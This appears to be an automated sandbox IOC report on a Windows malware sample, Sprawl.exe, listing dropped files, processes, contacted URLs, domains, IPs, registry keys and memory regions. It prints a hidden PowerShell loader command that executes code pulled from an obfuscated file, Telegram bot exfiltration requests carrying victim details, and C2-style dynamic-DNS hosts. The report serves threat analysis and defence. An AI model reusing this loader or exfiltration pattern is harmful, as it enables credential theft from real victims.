IOC Report
Sprawl.exe

loading gif

Files

File Path
Type
Category
Malicious
Sprawl.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej
ASCII text, with very long lines (3041), with CRLF, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_30wvgj0h.wbn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cwgsrsy0.q5t.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f23y1j4c.yt0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itlgu4z0.y4p.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhi4ov11.xlu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pv0eukwh.l1v.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwr55imd.0rq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wl5iocnr.qtb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\unnamed.jpg
JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x512, components 3
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\psychograph.rut
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\strudsfjerenes.uns
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Overtrdelser.Dok
data
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\aktivitetsrunde.txt
ASCII text, with very long lines (360), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\discourteously.gam
GTA audio index data (SDT)
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Sprawl.exe
"C:\Users\user\Desktop\Sprawl.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://reallyfreegeoip.org/xml/173.254.250.76$
unknown
https://duckduckgo.com/chrome_newtab
unknown
https://duckduckgo.com/ac/?q=
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://api.telegram.org/bot
unknown
http://crl.microsoft
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://reallyfreegeoip.org/xml/173.254.250.76
188.114.97.3
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://smtp.ionos.es
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
https://drive.go
unknown
https://www.google.com
unknown
http://checkip.dyndns.org/
193.122.6.168
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
https://apis.google.com
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20a
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://checkip.dyndns.org/C7T
unknown
http://nuget.org/NuGet.exe
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://drive.usercontent.google.com/
unknown
http://checkip.dyndns.org
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://www.ecosia.org/newtab/
unknown
https://chrome.google.com/webstore?hl=en8
unknown
https://github.com/Pester/Pester
unknown
https://drive.usercontent.google.com/U
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://www.office.com/8
unknown
http://nsis.sf.net/NSIS_Error
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
http://anotherarmy.dns.army:8081
unknown
https://reallyfreegeoip.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 42 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
smtp.ionos.es
213.165.67.102
malicious
api.telegram.org
149.154.167.220
malicious
checkip.dyndns.org
unknown
malicious
drive.google.com
142.250.184.238
drive.usercontent.google.com
142.250.185.65
checkip.dyndns.com
193.122.6.168

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
213.165.67.102
smtp.ionos.es
Germany
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
193.122.6.168
checkip.dyndns.com
United States
142.250.184.238
drive.google.com
United States
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\msiexec_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
21DF1000
trusted library allocation
page read and write
malicious
5B30000
remote allocation
page execute and read and write
malicious
B95D000
direct allocation
page execute and read and write
malicious
6390000
remote allocation
page execute and read and write
malicious
22911000
trusted library allocation
page read and write
malicious
B78B000
direct allocation
page execute and read and write
malicious
B4B4000
direct allocation
page execute and read and write
2E6E000
stack
page read and write
24A90000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B9FB000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
24F7E000
stack
page read and write
AF21000
direct allocation
page execute and read and write
322C000
heap
page read and write
24C80000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
22BB6000
trusted library allocation
page read and write
22B80000
trusted library allocation
page read and write
65F1000
heap
page read and write
2F9D000
trusted library allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
AE06000
direct allocation
page execute and read and write
AF29000
direct allocation
page execute and read and write
B0F5000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
BAEE000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B614000
direct allocation
page execute and read and write
AFB7000
direct allocation
page execute and read and write
B054000
direct allocation
page execute and read and write
C39000
stack
page read and write
24AA0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B6CB000
direct allocation
page execute and read and write
BE05000
direct allocation
page execute and read and write
B4D2000
direct allocation
page execute and read and write
BC3E000
direct allocation
page execute and read and write
21E63000
trusted library allocation
page read and write
BE6C000
direct allocation
page execute and read and write
22737000
stack
page read and write
B82B000
direct allocation
page execute and read and write
AF62000
direct allocation
page execute and read and write
AB90000
direct allocation
page execute and read and write
23C06000
trusted library allocation
page read and write
75C2000
heap
page read and write
BBF4000
direct allocation
page execute and read and write
8567000
heap
page read and write
22AA6000
trusted library allocation
page read and write
BB45000
direct allocation
page execute and read and write
B896000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B95A000
direct allocation
page execute and read and write
BA21000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B660000
direct allocation
page execute and read and write
BD16000
direct allocation
page execute and read and write
BC3A000
direct allocation
page execute and read and write
51BD000
stack
page read and write
B0F4000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
24991000
heap
page read and write
256B0000
trusted library allocation
page read and write
4E99000
heap
page read and write
22EA1000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
BA09000
direct allocation
page execute and read and write
B8CD000
direct allocation
page execute and read and write
8A04000
heap
page read and write
24C80000
trusted library allocation
page read and write
B209000
direct allocation
page execute and read and write
5F08000
trusted library allocation
page read and write
2EB0000
heap
page read and write
24EB0000
trusted library allocation
page read and write
BCBD000
direct allocation
page execute and read and write
BB15000
direct allocation
page execute and read and write
B345000
direct allocation
page execute and read and write
B409000
direct allocation
page execute and read and write
230A2000
trusted library allocation
page read and write
B155000
direct allocation
page execute and read and write
B9D5000
direct allocation
page execute and read and write
B611000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
ADEC000
direct allocation
page execute and read and write
7553000
heap
page read and write
22C95000
trusted library allocation
page read and write
B0D3000
direct allocation
page execute and read and write
8830000
trusted library allocation
page read and write
256E0000
trusted library allocation
page read and write
22055000
trusted library allocation
page read and write
322E000
stack
page read and write
34A0000
heap
page read and write
2279000
heap
page read and write
5B0000
heap
page execute and read and write
B8BB000
direct allocation
page execute and read and write
B5E8000
direct allocation
page execute and read and write
BE72000
direct allocation
page execute and read and write
B5FA000
direct allocation
page execute and read and write
BD9C000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
AFB9000
direct allocation
page execute and read and write
B0FE000
direct allocation
page execute and read and write
B39D000
direct allocation
page execute and read and write
620000
heap
page read and write
24C80000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
AC4B000
direct allocation
page execute and read and write
20F0000
heap
page read and write
240A0000
trusted library allocation
page read and write
BCB9000
direct allocation
page execute and read and write
B826000
direct allocation
page execute and read and write
4C0000
heap
page read and write
22A9B000
trusted library allocation
page read and write
24C6F000
stack
page read and write
ADE0000
direct allocation
page execute and read and write
B382000
direct allocation
page execute and read and write
22AC4000
trusted library allocation
page read and write
B203000
direct allocation
page execute and read and write
B41B000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
5B4D000
trusted library allocation
page read and write
AAF8000
direct allocation
page execute and read and write
B803000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
3424000
trusted library allocation
page read and write
B50E000
direct allocation
page execute and read and write
21EAC000
trusted library allocation
page read and write
22ACC000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
7050000
direct allocation
page read and write
24D92000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
2EFE000
stack
page read and write
AF48000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
82F4000
stack
page read and write
24D30000
trusted library allocation
page read and write
AB93000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
21DC0000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
B182000
direct allocation
page execute and read and write
A98C000
direct allocation
page execute and read and write
A85F000
direct allocation
page execute and read and write
B900000
direct allocation
page execute and read and write
23ED4000
trusted library allocation
page read and write
8951000
heap
page read and write
B7BF000
direct allocation
page execute and read and write
BE65000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
B07D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B5C1000
direct allocation
page execute and read and write
AE18000
direct allocation
page execute and read and write
AB16000
direct allocation
page execute and read and write
B24C000
direct allocation
page execute and read and write
ACAA000
direct allocation
page execute and read and write
B1B0000
direct allocation
page execute and read and write
6393000
trusted library allocation
page read and write
BFEE000
direct allocation
page execute and read and write
3238000
heap
page read and write
24F2E000
stack
page read and write
2460000
heap
page read and write
24B70000
trusted library allocation
page read and write
24670000
trusted library allocation
page read and write
B2CE000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B323000
direct allocation
page execute and read and write
73D0000
direct allocation
page read and write
AFB3000
direct allocation
page execute and read and write
BD82000
direct allocation
page execute and read and write
7527000
heap
page read and write
B7F2000
direct allocation
page execute and read and write
AE65000
direct allocation
page execute and read and write
B1B9000
direct allocation
page execute and read and write
256E0000
trusted library allocation
page read and write
BADA000
direct allocation
page execute and read and write
8C20000
trusted library allocation
page read and write
BAB4000
direct allocation
page execute and read and write
AE2D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
4DD0000
heap
page execute and read and write
BFF2000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
6E30000
direct allocation
page read and write
23F30000
trusted library allocation
page read and write
B74F000
direct allocation
page execute and read and write
B466000
direct allocation
page execute and read and write
BB23000
direct allocation
page execute and read and write
B7B2000
direct allocation
page execute and read and write
B295000
direct allocation
page execute and read and write
21ACF000
stack
page read and write
B100000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
452000
unkown
page readonly
AD93000
direct allocation
page execute and read and write
B5DA000
direct allocation
page execute and read and write
A7F4000
direct allocation
page execute and read and write
AE0A000
direct allocation
page execute and read and write
B80A000
direct allocation
page execute and read and write
BAAB000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
6400000
direct allocation
page read and write
24EB0000
trusted library allocation
page read and write
BA71000
direct allocation
page execute and read and write
7567000
heap
page read and write
B601000
direct allocation
page execute and read and write
AC33000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
B1BA000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
25780000
trusted library allocation
page read and write
B7AE000
direct allocation
page execute and read and write
BBAF000
direct allocation
page execute and read and write
78E5000
heap
page read and write
BA2E000
direct allocation
page execute and read and write
ADAE000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
8A21000
heap
page read and write
23F30000
trusted library allocation
page read and write
23FB0000
trusted library allocation
page read and write
7720000
heap
page read and write
229B0000
trusted library allocation
page read and write
BA5F000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
BD30000
direct allocation
page execute and read and write
AF7D000
direct allocation
page execute and read and write
771E000
stack
page read and write
B388000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B2E8000
direct allocation
page execute and read and write
B623000
direct allocation
page execute and read and write
22091000
trusted library allocation
page read and write
2205F000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
23F40000
trusted library allocation
page read and write
2F30000
trusted library section
page read and write
B732000
direct allocation
page execute and read and write
4E1E000
stack
page read and write
228B0000
trusted library allocation
page read and write
BA5C000
direct allocation
page execute and read and write
8565000
heap
page read and write
23F30000
trusted library allocation
page read and write
BB99000
direct allocation
page execute and read and write
7B9E000
stack
page read and write
BC5C000
direct allocation
page execute and read and write
BA9C000
direct allocation
page execute and read and write
AE96000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
745F000
stack
page read and write
24EB1000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
ABF9000
direct allocation
page execute and read and write
6399000
trusted library allocation
page read and write
21BB0000
remote allocation
page read and write
B771000
direct allocation
page execute and read and write
BC92000
direct allocation
page execute and read and write
BFA9000
direct allocation
page execute and read and write
ABC6000
direct allocation
page execute and read and write
BEB8000
direct allocation
page execute and read and write
25700000
trusted library allocation
page read and write
23F30000
trusted library allocation
page read and write
AF90000
direct allocation
page execute and read and write
B5F4000
direct allocation
page execute and read and write
ADE6000
direct allocation
page execute and read and write
73A0000
direct allocation
page read and write
89FA000
heap
page read and write
B3C6000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
BF4B000
direct allocation
page execute and read and write
B291000
direct allocation
page execute and read and write
B848000
direct allocation
page execute and read and write
23BB9000
trusted library allocation
page read and write
BE74000
direct allocation
page execute and read and write
8AA2000
heap
page read and write
4D30000
trusted library allocation
page read and write
AA34000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24A90000
trusted library allocation
page read and write
B69B000
direct allocation
page execute and read and write
B9BE000
direct allocation
page execute and read and write
5A28000
trusted library allocation
page read and write
B8A7000
direct allocation
page execute and read and write
B079000
direct allocation
page execute and read and write
A78F000
direct allocation
page execute and read and write
B411000
direct allocation
page execute and read and write
22FC5000
trusted library allocation
page read and write
B7A6000
direct allocation
page execute and read and write
AEBF000
direct allocation
page execute and read and write
BB9D000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
256B0000
trusted library allocation
page read and write
B371000
direct allocation
page execute and read and write
8CC0000
trusted library allocation
page execute and read and write
B122000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
ADA2000
direct allocation
page execute and read and write
BCF2000
direct allocation
page execute and read and write
C021000
direct allocation
page execute and read and write
BEBA000
direct allocation
page execute and read and write
BB65000
direct allocation
page execute and read and write
A974000
direct allocation
page execute and read and write
7B1E000
stack
page read and write
B973000
direct allocation
page execute and read and write
B697000
direct allocation
page execute and read and write
B7CB000
direct allocation
page execute and read and write
6F90000
direct allocation
page read and write
24C80000
trusted library allocation
page read and write
BDBD000
direct allocation
page execute and read and write
BC85000
direct allocation
page execute and read and write
240B0000
trusted library allocation
page read and write
23C01000
trusted library allocation
page read and write
B034000
direct allocation
page execute and read and write
21FE1000
trusted library allocation
page read and write
B6C3000
direct allocation
page execute and read and write
B72F000
direct allocation
page execute and read and write
ADAC000
direct allocation
page execute and read and write
BB97000
direct allocation
page execute and read and write
507C000
stack
page read and write
B5A7000
direct allocation
page execute and read and write
B645000
direct allocation
page execute and read and write
342D000
trusted library allocation
page execute and read and write
8680000
trusted library allocation
page read and write
B892000
direct allocation
page execute and read and write
B07D000
direct allocation
page execute and read and write
AF77000
direct allocation
page execute and read and write
AF2D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
BBAA000
direct allocation
page execute and read and write
B756000
direct allocation
page execute and read and write
B2FA000
direct allocation
page execute and read and write
B415000
direct allocation
page execute and read and write
B3BC000
direct allocation
page execute and read and write
2392B000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
AEB8000
direct allocation
page execute and read and write
AD6D000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B559000
direct allocation
page execute and read and write
A8A5000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
B227000
direct allocation
page execute and read and write
BC3C000
direct allocation
page execute and read and write
BB9B000
direct allocation
page execute and read and write
21E90000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
30A3000
heap
page read and write
AE9C000
direct allocation
page execute and read and write
AEB6000
direct allocation
page execute and read and write
226EB000
stack
page read and write
23FA0000
trusted library allocation
page read and write
21DD6000
trusted library allocation
page read and write
21E8C000
trusted library allocation
page read and write
22FB2000
trusted library allocation
page read and write
21CE0000
trusted library allocation
page execute and read and write
77BE000
stack
page read and write
B898000
direct allocation
page execute and read and write
B2E2000
direct allocation
page execute and read and write
B6B0000
direct allocation
page execute and read and write
BCDE000
direct allocation
page execute and read and write
AF23000
direct allocation
page execute and read and write
B1B5000
direct allocation
page execute and read and write
8467000
heap
page read and write
BEC0000
direct allocation
page execute and read and write
B24A000
direct allocation
page execute and read and write
B1CB000
direct allocation
page execute and read and write
B7DA000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
B0CA000
direct allocation
page execute and read and write
3186000
heap
page read and write
25040000
trusted library allocation
page read and write
B6D8000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
64C0000
direct allocation
page read and write
B492000
direct allocation
page execute and read and write
B892000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
B4A3000
direct allocation
page execute and read and write
604C000
trusted library allocation
page read and write
B796000
direct allocation
page execute and read and write
86C0000
trusted library allocation
page read and write
23184000
trusted library allocation
page read and write
446000
unkown
page readonly
24EB0000
trusted library allocation
page read and write
AC25000
direct allocation
page execute and read and write
23F40000
trusted library allocation
page read and write
B511000
direct allocation
page execute and read and write
313E000
stack
page read and write
BAAD000
direct allocation
page execute and read and write
B9AE000
direct allocation
page execute and read and write
BDAC000
direct allocation
page execute and read and write
B81A000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
B7C3000
direct allocation
page execute and read and write
BC1C000
direct allocation
page execute and read and write
5641000
trusted library allocation
page read and write
BBFE000
direct allocation
page execute and read and write
AE29000
direct allocation
page execute and read and write
32C8000
heap
page read and write
B2D4000
direct allocation
page execute and read and write
24670000
trusted library allocation
page read and write
22F40000
trusted library allocation
page read and write
AD9F000
direct allocation
page execute and read and write
BDBF000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
708E000
heap
page read and write
B39A000
direct allocation
page execute and read and write
BC44000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B4C9000
direct allocation
page execute and read and write
A83D000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B9E1000
direct allocation
page execute and read and write
ACE7000
direct allocation
page execute and read and write
BCEF000
direct allocation
page execute and read and write
B207000
direct allocation
page execute and read and write
B2BD000
direct allocation
page execute and read and write
229C8000
trusted library allocation
page read and write
8901000
heap
page read and write
24D30000
trusted library allocation
page read and write
BDBC000
direct allocation
page execute and read and write
B4A1000
direct allocation
page execute and read and write
226F0000
heap
page read and write
23F30000
trusted library allocation
page read and write
22EB7000
trusted library allocation
page read and write
B0B1000
direct allocation
page execute and read and write
B135000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
B7A8000
direct allocation
page execute and read and write
BB86000
direct allocation
page execute and read and write
409000
unkown
page write copy
3180000
heap
page read and write
23F30000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
440000
unkown
page read and write
B8AD000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
2466E000
stack
page read and write
21BB0000
remote allocation
page read and write
B04A000
direct allocation
page execute and read and write
51FB000
stack
page read and write
25060000
trusted library allocation
page read and write
AD3F000
direct allocation
page execute and read and write
24D30000
trusted library allocation
page read and write
AD37000
direct allocation
page execute and read and write
5698000
trusted library allocation
page read and write
AEAC000
direct allocation
page execute and read and write
23FA0000
trusted library allocation
page read and write
23F40000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
AF5C000
direct allocation
page execute and read and write
BBEC000
direct allocation
page execute and read and write
BF84000
direct allocation
page execute and read and write
B3D9000
direct allocation
page execute and read and write
BEC5000
direct allocation
page execute and read and write
BB0D000
direct allocation
page execute and read and write
BB3C000
direct allocation
page execute and read and write
B49F000
direct allocation
page execute and read and write
BF8B000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
B987000
direct allocation
page execute and read and write
BDE3000
direct allocation
page execute and read and write
B583000
direct allocation
page execute and read and write
B3C7000
direct allocation
page execute and read and write
B38A000
direct allocation
page execute and read and write
BACC000
direct allocation
page execute and read and write
B5A2000
direct allocation
page execute and read and write
AE2C000
direct allocation
page execute and read and write
AF6B000
direct allocation
page execute and read and write
5360000
heap
page execute and read and write
BED3000
direct allocation
page execute and read and write
B670000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
B812000
direct allocation
page execute and read and write
BAB2000
direct allocation
page execute and read and write
B711000
direct allocation
page execute and read and write
BFAD000
direct allocation
page execute and read and write
24CB0000
trusted library allocation
page read and write
305C000
heap
page read and write
23FA0000
trusted library allocation
page read and write
24EB0000
trusted library allocation
page read and write
23CB7000
trusted library allocation
page read and write
B5EF000
direct allocation
page execute and read and write
B8E0000
direct allocation
page execute and read and write
21F76000
trusted library allocation
page read and write
2505A000
trusted library allocation
page read and write
B386000
direct allocation
page execute and read and write
AFF6000
direct allocation
page execute and read and write
21EA0000
trusted library allocation
page read and write
240B0000
trusted library allocation
page read and write
25060000
trusted library allocation
page read and write
B03A000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
BA40000
direct allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
B34D000
direct allocation
page execute and read and write
25060000
trusted library allocation
page read and write
24C80000
trusted library allocation
page read and write
B4DF000
direct allocation
page execute and read and write
25780000
trusted library allocation
page read and write
7B5E000
stack
page read and write
B229000
direct allocation
page execute and read and write
B9F5000
direct allocation
page execute and read and write
B9DB000
direct allocation
page execute and read and write
B1AE000
direct allocation
page execute and read and write
256B0000
trusted library allocation
page read and write
ADB0000
direct allocation
page execute and read and write
23AE5000
trusted library allocation
page read and write
B5C9000
direct allocation
page execute and read and write
AF9B000
direct allocation
page execute and read and write
6643000
heap
page read and write
B12B000
direct allocation
page execute and read and write
B80C000
direct allocation
page execute and read and write
3227000
trusted library allocation
page execute and read and write
256D0000
trusted library allocation
page read and write
23FA0000
trusted library allocation
page read and write
22B76000
trusted library allocation
page read and write
229C0000
trusted library allocation
page read and write
23A60000
trusted library allocation
page read and write
B473000
direct allocation
page execute and read and write
BFCA000
direct allocation
page execute and read and write
B4CD000
direct allocation
page execute and read and write
24A90000
trusted library allocation
page read and write
B071000
direct allocation
page execute and read and write
256E0000
trusted library allocation
page execute and read and write
BDEC000
direct allocation
page execute and read and write
B72D000
direct allocation
page execute and read and write
BC34000
direct allocation
page execute and read and write
24CA0000
trusted library allocation
page read and write
877E000
stack
page read and write
BCE0000
direct allocation
page execute and read and write
3299000
heap
page read and write
B679000
direct allocation
page execute and read and write
AFBB000
direct allocation
page execute and read and write
BF47000
direct allocation
page execute and read and write
6520000
direct allocation
page read and write
6F10000
direct allocation
page read and write
228E0000
trusted library allocation
page read and write
B075000
direct allocation
page execute and read and write
AEF000
stack
page read and write
A8DC000
direct allocation
page execute and read and write
BC80000
direct allocation
page execute and read and write
B9FD000
direct allocation
page execute and read and write
24EB0000
trusted library allocation
page read and write
23F40000
trusted library allocation
page read and write
B868000
direct allocation
page execute and read and write
24C80000
trusted library allocation
page read and write
86B0000
trusted library allocation
page execute and read and write
2259E000
stack
page read and write
24D66000
trusted library allocation
page read and write
B1EE000
direct allocation
page execute and read and write
BD36000
direct allocation
page execute and read and write
B9FF000
